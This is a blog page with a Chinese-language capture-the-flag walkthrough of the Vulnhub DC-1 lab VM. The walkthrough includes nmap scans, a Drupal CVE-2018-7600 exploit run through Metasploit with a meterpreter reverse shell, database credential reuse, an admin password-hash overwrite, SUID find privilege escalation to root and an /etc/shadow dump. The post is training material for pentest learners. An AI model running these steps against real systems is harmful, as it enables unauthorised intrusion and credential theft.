

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>Vulnhub DC 1过关笔记 - M0untainShley</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"ee9387c15cc7097331ccc74141d07081","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>M0untainShley</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Vulnhub DC 1过关笔记">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-10-23 15:14" pubdate>
        October 23, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      32
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Vulnhub DC 1过关笔记</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：October 23, 2021 pm
                
              </p>
            
            <div class="markdown-body">
              <h3 id="靶场简介"><a href="#靶场简介" class="headerlink" title="靶场简介"></a>靶场简介</h3><p>DC-1 是一个特意建造的易受攻击的实验室，目的是在渗透测试领域获得经验。</p>
<p>它旨在为初学者带来挑战，但它的难易程度取决于您的技能和知识以及您的学习能力。</p>
<p>要成功完成此挑战，您需要具备 Linux 技能、熟悉 Linux 命令行并具有使用基本渗透测试工具（例如 Kali Linux 或 Parrot Security OS 上的工具）的经验。</p>
<p>有多种获得 root 的方法，但是，我已经包含了一些包含初学者线索的标志。</p>
<p>总共有五个标志，但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要是 root 用户即可执行此操作，但是，您将需要 root 权限。</p>
<p>根据您的技能水平，您可能可以跳过查找这些标志中的大部分并直接查找 root。</p>
<p>初学者可能会遇到他们以前从未遇到过的挑战，但只需通过 Google 搜索即可获得完成此挑战所需的信息</p>
<h3 id="靶场获取"><a href="#靶场获取" class="headerlink" title="靶场获取"></a>靶场获取</h3><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-1,292/">https://www.vulnhub.com/entry/dc-1,292/</a></p>
<h3 id="获取Flag"><a href="#获取Flag" class="headerlink" title="获取Flag"></a>获取Flag</h3><h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>靶场使用的是桥接模式，第一步，探测网段内存活主机，看下我们的靶机的IP是多少</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ nmap -sP 192.168.199.0/24<br>...<br>Nmap scan report <span class="hljs-keyword">for</span> DC-1.lan (192.168.199.245)<br>Host is up (0.022s latency).<br>MAC Address: 00:0C:29:FC:6F:79 (VMware)<br></code></pre></td></tr></table></figure>



<p>发现192.168.199.245的banner信息——DC-1，了接下来，扫描该主机开放的端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ nmap -O -sV -sT -T4 -p- 192.168.199.245<br>Nmap scan report <span class="hljs-keyword">for</span> DC-1.lan (192.168.199.245)<br>Host is up (0.00071s latency).<br>Not shown: 65528 filtered ports<br>PORT      STATE SERVICE    VERSION<br>22/tcp    open  ssh        OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)<br>25/tcp    open  tcpwrapped<br>80/tcp    open  http       Apache httpd 2.2.22 ((Debian))<br>110/tcp   open  tcpwrapped<br>111/tcp   open  rpcbind    2-4 (RPC <span class="hljs-comment">#100000)</span><br>2333/tcp  open  tcpwrapped<br>55631/tcp open  status     1 (RPC <span class="hljs-comment">#100024)</span><br>MAC Address: 00:0C:29:FC:6F:79 (VMware)<br>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port<br>Device <span class="hljs-built_in">type</span>: general purpose<br>Running: Linux 3.X<br>OS CPE: cpe:/o:linux:linux_kernel:3<br>OS details: Linux 3.2 - 3.16<br>Network Distance: 1 hop<br>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel<br><br>OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br>Nmap <span class="hljs-keyword">done</span>: 1 IP address (1 host up) scanned <span class="hljs-keyword">in</span> 2674.80 seconds<br><br></code></pre></td></tr></table></figure>



<p>可以看到开放了22和80端口还有其他端口，其他端口服务都是些无关紧要的服务，跟拿flag应该是没关系的，于是着重分析下22号端口和80端口，22端口用于ssh，可以使用hydra进行暴力破解，无果（也是，作者肯定不会直接让root的ssh使用弱口令的），下面分析80端口</p>
<p>访问 <a target="_blank" rel="noopener" href="http://192.168.199.245/">http://192.168.199.245/</a> </p>
<img src="/img/Vulnhub-DC-1过关笔记/1.png" srcset="/img/loading.gif" lazyload>

</br>

<p>系统使用Drupal CMS，网上搜了一下，该CMS是存在历史漏洞的，需要确定一下版本，于是右键-查看源码，发现了版本，使用的是Drupal  7</p>
<img src="/img/Vulnhub-DC-1过关笔记/2.png" srcset="/img/loading.gif" lazyload>

</br>

<p>于是在网站上找Drupal  7存在的漏洞以及EXP，在github上找了一下，项目地址<a target="_blank" rel="noopener" href="https://github.com/pimps/CVE-2018-7600">https://github.com/pimps/CVE-2018-7600</a></p>
<p>使用<a target="_blank" rel="noopener" href="https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py">https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7600.py</a> 脚本，发现是可以执行命令的</p>
<img src="/img/Vulnhub-DC-1过关笔记/3.png" srcset="/img/loading.gif" lazyload>

</br>

<p><strong>于是，就想使用bash或者nc反弹一个shell回来，但是都失败了，写webshell也失败了，使用echo进行写shell的时候，$_POST会被自动替换成空，有师傅看到这篇文章时知道是什么问题的话希望解答一下，提前谢谢啦~</strong></p>
<p>写shell写不进去，那么就换一个思路，看看msf能不能弹一个shell回来，msf启动！</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs bash">msf6 &gt; search CVE-2018-7600  <span class="hljs-comment"># 查找对应的CVE编号</span><br><br>Matching Modules<br>================<br><br>   <span class="hljs-comment">#  Name                                      Disclosure Date  Rank       Check  Description</span><br>   -  ----                                      ---------------  ----       -----  -----------<br>   0  exploit/unix/webapp/drupal_drupalgeddon2  2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection<br>msf6 &gt; use exploit/unix/webapp/drupal_drupalgeddon2  <span class="hljs-comment"># 使用该模块</span><br>[*] No payload configured, defaulting to php/meterpreter/reverse_tcp<br>msf6 exploit(unix/webapp/drupal_drupalgeddon2) &gt; show options  <span class="hljs-comment"># 查看参数</span><br>...<br>msf6 exploit(unix/webapp/drupal_drupalgeddon2) &gt; <span class="hljs-built_in">set</span> rhosts 192.168.199.245  <span class="hljs-comment"># 设置必填项</span><br>rhosts =&gt; 192.168.199.245<br>msf6 exploit(unix/webapp/drupal_drupalgeddon2) &gt; run  <span class="hljs-comment"># 运行即可</span><br>...<br>meterpreter &gt; shell  <span class="hljs-comment"># 进入shell界面</span><br><span class="hljs-built_in">which</span> python  <span class="hljs-comment"># 判断是否存在python环境</span><br>/usr/bin/python<br>python -c <span class="hljs-string">&quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;);&quot;</span> <span class="hljs-comment"># 使用python创建一个shell</span><br>www-data@DC-1:/var/www$<br></code></pre></td></tr></table></figure>

<h4 id="Flag1"><a href="#Flag1" class="headerlink" title="Flag1"></a>Flag1</h4><p>flag1就在网站的根目录下</p>
<img src="/img/Vulnhub-DC-1过关笔记/4.png" srcset="/img/loading.gif" lazyload>

</br>

<p>可以看到网站下还有一个robots.txt，那么再来看看robots.txt中有什么</p>
<img src="/img/Vulnhub-DC-1过关笔记/5.png" srcset="/img/loading.gif" lazyload>

</br>

<p>有没有很意外！</p>
<h4 id="Flag2"><a href="#Flag2" class="headerlink" title="Flag2"></a>Flag2</h4><p>根据flag1的提示，我们可以猜想flag2存在于网站的配置文件中</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">Every good CMS needs a config file - and so <span class="hljs-keyword">do</span> you.<br></code></pre></td></tr></table></figure>



<p>网上下了一份源码，经过关键词搜索，发现了一个可疑的配置文件，位于./sites/default/settings.php，看一下该文件的内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ cat ./sites/default/settings.php<br>&lt;?php<br><br>/**<br> *<br> * flag2<br> * Brute force and dictionary attacks aren<span class="hljs-string">&#x27;t the</span><br><span class="hljs-string"> * only ways to gain access (and you WILL need access).</span><br><span class="hljs-string"> * What can you do with these credentials?</span><br><span class="hljs-string"> *</span><br><span class="hljs-string"> */</span><br><span class="hljs-string"></span><br><span class="hljs-string">$databases = array (</span><br><span class="hljs-string">  &#x27;</span>default<span class="hljs-string">&#x27; =&gt;</span><br><span class="hljs-string">  array (</span><br><span class="hljs-string">    &#x27;</span>default<span class="hljs-string">&#x27; =&gt;</span><br><span class="hljs-string">    array (</span><br><span class="hljs-string">      &#x27;</span>database<span class="hljs-string">&#x27; =&gt; &#x27;</span>drupaldb<span class="hljs-string">&#x27;,</span><br><span class="hljs-string">      &#x27;</span>username<span class="hljs-string">&#x27; =&gt; &#x27;</span>dbuser<span class="hljs-string">&#x27;,</span><br><span class="hljs-string">      &#x27;</span>password<span class="hljs-string">&#x27; =&gt; &#x27;</span>R0ck3t<span class="hljs-string">&#x27;,</span><br><span class="hljs-string">      &#x27;</span>host<span class="hljs-string">&#x27; =&gt; &#x27;</span>localhost<span class="hljs-string">&#x27;,</span><br><span class="hljs-string">      &#x27;</span>port<span class="hljs-string">&#x27; =&gt; &#x27;</span><span class="hljs-string">&#x27;,</span><br><span class="hljs-string">      &#x27;</span>driver<span class="hljs-string">&#x27; =&gt; &#x27;</span>mysql<span class="hljs-string">&#x27;,</span><br><span class="hljs-string">      &#x27;</span>prefix<span class="hljs-string">&#x27; =&gt; &#x27;</span><span class="hljs-string">&#x27;,</span><br><span class="hljs-string">    ),</span><br><span class="hljs-string">  ),</span><br><span class="hljs-string">);</span><br><span class="hljs-string">...</span><br></code></pre></td></tr></table></figure>



<p>现在我们收获了Flag2和数据库的账号连接账号和密码</p>
<h4 id="Flag3"><a href="#Flag3" class="headerlink" title="Flag3"></a>Flag3</h4><p>根据flag2的提示</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">Brute force and dictionary attacks aren<span class="hljs-string">&#x27;t the only ways to gain access (and you WILL need access).</span><br><span class="hljs-string">What can you do with these credentials?</span><br></code></pre></td></tr></table></figure>



<p>查看下服务器上开放的端口，开放了数据库端口，前期的端口扫描中是没发现3306端口的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ netstat -tunlp<br>...<br>tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -<br></code></pre></td></tr></table></figure>



<p>连接数据库看看</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ mysql -u dbuser -p<br>Enter password: R0ck3t<br><br>mysql&gt; use drupaldb;<br><br>mysql&gt; show tables;<br><br>mysql&gt; select * from users;<br></code></pre></td></tr></table></figure>



<p>可以看到管理员的密码，但是还是没有flag3的信息</p>
<img src="/img/Vulnhub-DC-1过关笔记/6.png" srcset="/img/loading.gif" lazyload>

</br>

<p>看看其他的表</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">mysql&gt; select * from node;<br></code></pre></td></tr></table></figure>



<p>在node表中发现了flag3的信息，但是没有flag3的值</p>
<img src="/img/Vulnhub-DC-1过关笔记/7.png" srcset="/img/loading.gif" lazyload>

</br>

<p><strong>接下来只演示拿到flag3的值，网上找了很多资料也不太清楚这样做的原因是什么，有师傅知道的话，可以跟我交流下</strong></p>
<p>存放在users表中的密码字段是使用SHA-512进行加密的，SHA-512是哈希，因此解密难度太大，我们可以在数据库中修改管理员的密码哈希来修改管理员密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># pass值为&quot;password&quot;加密后的值</span><br>update users <span class="hljs-built_in">set</span> pass=<span class="hljs-string">&#x27;$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4&#x27;</span> <span class="hljs-built_in">where</span> name=<span class="hljs-string">&#x27;admin&#x27;</span>;<br></code></pre></td></tr></table></figure>



<p>修改后使用admin/password登录即可，依次点击dashboard-flag3即可拿到flag3的值</p>
<img src="/img/Vulnhub-DC-1过关笔记/8.png" srcset="/img/loading.gif" lazyload>

</br>

<img src="/img/Vulnhub-DC-1过关笔记/9.png" srcset="/img/loading.gif" lazyload>

</br>

<img src="/img/Vulnhub-DC-1过关笔记/10.png" srcset="/img/loading.gif" lazyload>



<h4 id="Flag4"><a href="#Flag4" class="headerlink" title="Flag4"></a>Flag4</h4><p>根据flag3的提示，出现的关键字：FIND、PERM和-exec，应该是使用SUID进行提权，然后我们再看看shadow文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">Special PERMS will <span class="hljs-built_in">help</span> FIND the passwd - but you<span class="hljs-string">&#x27;ll need to -exec that command to work out how to get what&#x27;</span>s <span class="hljs-keyword">in</span> the shadow.<br></code></pre></td></tr></table></figure>



<h4 id="Flag5"><a href="#Flag5" class="headerlink" title="Flag5"></a>Flag5</h4><p>查看是否有可以利用SUID提权的命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ find / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/null<br>find / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/null<br>/bin/mount<br>/bin/ping<br>/bin/su<br>/bin/ping6<br>/bin/umount<br>/usr/bin/chsh<br>/usr/bin/passwd<br>/usr/bin/newgrp<br>/usr/bin/chfn<br>/usr/bin/gpasswd<br>/usr/bin/procmail<br>/usr/bin/find<br>/usr/sbin/exim4<br>/usr/lib/pt_chown<br>/usr/lib/openssh/ssh-keysign<br>/usr/lib/eject/dmcrypt-get-device<br>/usr/lib/dbus-1.0/dbus-daemon-launch-helper<br>/sbin/mount.nfs<br></code></pre></td></tr></table></figure>



<p>看到了find命令，接下来进行SUID提权，<strong>接下来找flag的过程可以配合我的命令的注释进行，这里需要有linux SUID提权的知识储备，没有的话可以先去网上稍微找点资料看看</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ <span class="hljs-built_in">cd</span> /tmp  <span class="hljs-comment"># 进入/tmp</span><br><span class="hljs-built_in">cd</span> /tmp<br>$ touch pri  <span class="hljs-comment"># 创建pri文件</span><br>touch pri<br>$ find pri -<span class="hljs-built_in">exec</span> <span class="hljs-string">&quot;whoami&quot;</span> \;  <span class="hljs-comment"># 测试是否可以提权</span><br>find pri -<span class="hljs-built_in">exec</span> <span class="hljs-string">&quot;whoami&quot;</span> \;<br>root  <span class="hljs-comment"># 输出root，可以进行提权</span><br>$ touch pri.sh  <span class="hljs-comment"># 创建配合提权的pri.sh脚本</span><br>touch pri.sh<br>$ find pri.sh -<span class="hljs-built_in">exec</span> <span class="hljs-string">&quot;/bin/sh&quot;</span> \;  <span class="hljs-comment"># 提权，成功后会在此界面出现一个root权限的shell</span><br>find pri.sh -<span class="hljs-built_in">exec</span> <span class="hljs-string">&quot;/bin/sh&quot;</span> \;<br><br><span class="hljs-comment">###########################################################################</span><br><br>$ whoami  <span class="hljs-comment"># 提权成功</span><br>whoami<br>root<br>$ ls /root  <span class="hljs-comment"># 查看root的家目录下有什么，发现了最后一个flag</span><br>ls /root<br>thefinalflag.txt<br>$ cat /root/thefinalflag.txt  <span class="hljs-comment"># 查看flag内容</span><br>cat /root/thefinalflag.txt<br>Well <span class="hljs-keyword">done</span>!!!!<br><br>Hopefully you<span class="hljs-string">&#x27;ve enjoyed this and learned some new skills.</span><br><span class="hljs-string"></span><br><span class="hljs-string">You can let me know what you thought of this little journey</span><br><span class="hljs-string">by contacting me via Twitter - @DCAU7  # 我们是不是还缺少了什么？是的，就是flag4，去看看shadow下有什么</span><br><span class="hljs-string">$ cat /etc/shadow</span><br><span class="hljs-string">cat /etc/shadow</span><br><span class="hljs-string">root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::</span><br><span class="hljs-string">daemon:*:17946:0:99999:7:::</span><br><span class="hljs-string">bin:*:17946:0:99999:7:::</span><br><span class="hljs-string">sys:*:17946:0:99999:7:::</span><br><span class="hljs-string">sync:*:17946:0:99999:7:::</span><br><span class="hljs-string">games:*:17946:0:99999:7:::</span><br><span class="hljs-string">man:*:17946:0:99999:7:::</span><br><span class="hljs-string">lp:*:17946:0:99999:7:::</span><br><span class="hljs-string">mail:*:17946:0:99999:7:::</span><br><span class="hljs-string">news:*:17946:0:99999:7:::</span><br><span class="hljs-string">uucp:*:17946:0:99999:7:::</span><br><span class="hljs-string">proxy:*:17946:0:99999:7:::</span><br><span class="hljs-string">www-data:*:17946:0:99999:7:::</span><br><span class="hljs-string">backup:*:17946:0:99999:7:::</span><br><span class="hljs-string">list:*:17946:0:99999:7:::</span><br><span class="hljs-string">irc:*:17946:0:99999:7:::</span><br><span class="hljs-string">gnats:*:17946:0:99999:7:::</span><br><span class="hljs-string">nobody:*:17946:0:99999:7:::</span><br><span class="hljs-string">libuuid:!:17946:0:99999:7:::</span><br><span class="hljs-string">Debian-exim:!:17946:0:99999:7:::</span><br><span class="hljs-string">statd:*:17946:0:99999:7:::</span><br><span class="hljs-string">messagebus:*:17946:0:99999:7:::</span><br><span class="hljs-string">sshd:*:17946:0:99999:7:::</span><br><span class="hljs-string">mysql:!:17946:0:99999:7:::</span><br><span class="hljs-string">flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::    # 有个flag4的账户，去他的家目录看看</span><br><span class="hljs-string">$ ls /home/flag4  # 发现了flag4</span><br><span class="hljs-string">ls /home/flag4</span><br><span class="hljs-string">flag4.txt</span><br><span class="hljs-string">$ cat /home/flag4/flag4.txt  # 完成</span><br><span class="hljs-string">cat /home/flag4/flag4.txt</span><br><span class="hljs-string">Can you use this same method to find or access the flag in root?</span><br><span class="hljs-string"></span><br><span class="hljs-string">Probably. But perhaps it&#x27;</span>s not that easy.  Or maybe it is?<br></code></pre></td></tr></table></figure>



<p>到此为止我们找到了所有的flag</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Vulnhub-DC-1/">Vulnhub DC 1</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    转载请保留原文链接及作者
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/10/22/Linux%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/">
                        <span class="hidden-mobile">Linux提权方式总结（未完成）</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"87DviF4Tc6ftT198Wx2XV99q-gzGzoHsz","appKey":"wWetKPApalpJJoqj5nyGYBJl","placeholder":"说点什么","path":"window.location.pathname","avatar":"retro","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false,"requiredFields":[]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
